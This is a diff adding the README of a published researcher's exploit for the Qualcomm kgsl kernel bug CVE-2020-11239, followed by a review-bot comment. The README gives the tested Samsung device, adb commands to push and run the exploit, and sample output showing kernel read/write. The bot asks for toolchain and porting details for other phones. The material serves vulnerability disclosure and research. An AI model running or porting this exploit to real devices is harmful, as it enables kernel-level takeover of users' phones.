| 1 | +## Exploit for Qualcomm CVE-2020-11239 |
| 2 | + |
| 3 | +The write up can be found [here](https://securitylab.github.com/research/one_day_short_of_a_fullchain_android). This is a bug in the Qualcomm kgsl driver I reported in July 2020. The GitHub Advisory can be found [here](https://securitylab.github.com/advisories/GHSL-2020-375-kgsl). The bug can be used to gain arbitrary kernel code execution, read and write from the untrusted app domain. |
| 4 | + |
| 5 | +The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXUATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683. The offsets in the exploit refers to that version of the firmware. For different models of phones, the macro `DMA_ADDRESS`, which indicates the address of the SWIOTLB buffer, will also need to be changed. |
| 6 | + |
| 7 | +The exploit is reasonably reliable, although it does need to wait a few minutes after start up, after the kernel activities settled down before running. |
| 8 | + |
| 9 | +The most likely cause of failure is when it failed to locate the file structs after 5 retries. In this case there is no adverse effect and the phone will not crash. However, running the exploit immediately is unlikely to succeed and it usually requires waiting for a bit or doing something else to reorganize the heap before running it again. |
| 10 | + |
| 11 | +To test, cross compile the file `kgsl_exploit_slab_a71.c` and then execute with `adb`: |
| 12 | + |
| 13 | +``` |
| 14 | +adb push kgsl_exploit_slab_a71 /data/local/tmp |
| 15 | +adb shell |
| 16 | +a71:/ $ /data/local/tmp/kgsl_exploit_slab_a71 |
| 17 | +``` |
| 18 | + |
| 19 | +If succeeded, it will run a eBPF program to write and read to an address and confirm the successful read and write: |
| 20 | + |
| 21 | +``` |
| 22 | +rpc opened |
| 23 | +[+] reallocation data initialized! |
| 24 | +[ ] initializing reallocation threads, please wait... |
| 25 | +[+] 8 reallocation threads ready! |
| 26 | +micros_used: 19432 |
| 27 | +[+] REALLOC THREAD finished |
| 28 | +[+] REALLOC THREAD finished |
| 29 | +[+] REALLOC THREAD finished |
| 30 | +[+] REALLOC THREAD finished |
| 31 | +[+] REALLOC THREAD finished |
| 32 | +[+] REALLOC THREAD finished |
| 33 | +[+] REALLOC THREAD finished |
| 34 | +[+] REALLOC THREAD finished |
| 35 | +[+] Read/Write operation succeeded |
| 36 | +[+] syncing bounce buffers |
| 37 | +done read 0 |
| 38 | +[+] Found null_fops at 2 region offset 32 ffffff80099d9788 |
| 39 | +null file addr: ffffffc12a993058 |
| 40 | +[+] ion region location: ffffffc12a992000 |
| 41 | +[+] bpf addr: ffffff8008317088 |
| 42 | +overwrite fops ffffff80099d9788 |
| 43 | +overwrite fops 0 |
| 44 | +[-] Failed to find dma_buf_fops |
| 45 | +[+] syncing bounce buffers |
| 46 | +[+] reallocation data initialized! |
| 47 | +[ ] initializing reallocation threads, please wait... |
| 48 | +[+] 8 reallocation threads ready! |
| 49 | +micros_used: 19938 |
| 50 | +[+] REALLOC THREAD finished |
| 51 | +[+] REALLOC THREAD finished |
| 52 | +[+] REALLOC THREAD finished |
| 53 | +[+] REALLOC THREAD finished |
| 54 | +[+] REALLOC THREAD finished |
| 55 | +[+] REALLOC THREAD finished |
| 56 | +[+] REALLOC THREAD finished |
| 57 | +[+] REALLOC THREAD finished |
| 58 | +[+] Read/Write operation succeeded |
| 59 | +running bpf program |
| 60 | +bpf_data 0x3039 |
| 61 | +[+] successful read |
| 62 | +``` |
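Review bot: The sample output under "If succeeded" (line 19 onward) is itself a retry transcript, not a clean success: the first pass ends with "[-] Failed to find dma_buf_fops" and the reallocation threads are spun up a second time before "[+] successful read" appears, so a reader following line 19 literally would take the first run as a failure. Say in the paragraph at line 19 that intermediate "[-] Failed to find dma_buf_fops" lines are expected while the exploit retries (up to the 5 attempts mentioned at line 9) and that only the final "bpf_data 0x3039 / [+] successful read" pair marks success, and that a run that exhausts the retries exits without the "[+] successful read" line. Line 11 tells the reader to "cross compile the file" but names no target or toolchain; since the binary runs on an arm64 Android kernel, state the target triple and the compiler you built with, otherwise the push/exec steps at lines 14-17 cannot be reproduced. Line 5 says `DMA_ADDRESS` must be changed for other models but not how to obtain the SWIOTLB buffer address for a new device, and "The offsets in the exploit refers to that version" does not say which symbols or macros those are; listing them would let porters know what to adjust. Minor wording: line 5 "refers" should be "refer", line 19 "If succeeded, it will run a eBPF program to write and read to an address" reads better as "If successful, it runs an eBPF program that writes to and reads from an address", and line 7 "after the kernel activities settled down" as "after kernel activity has settled down".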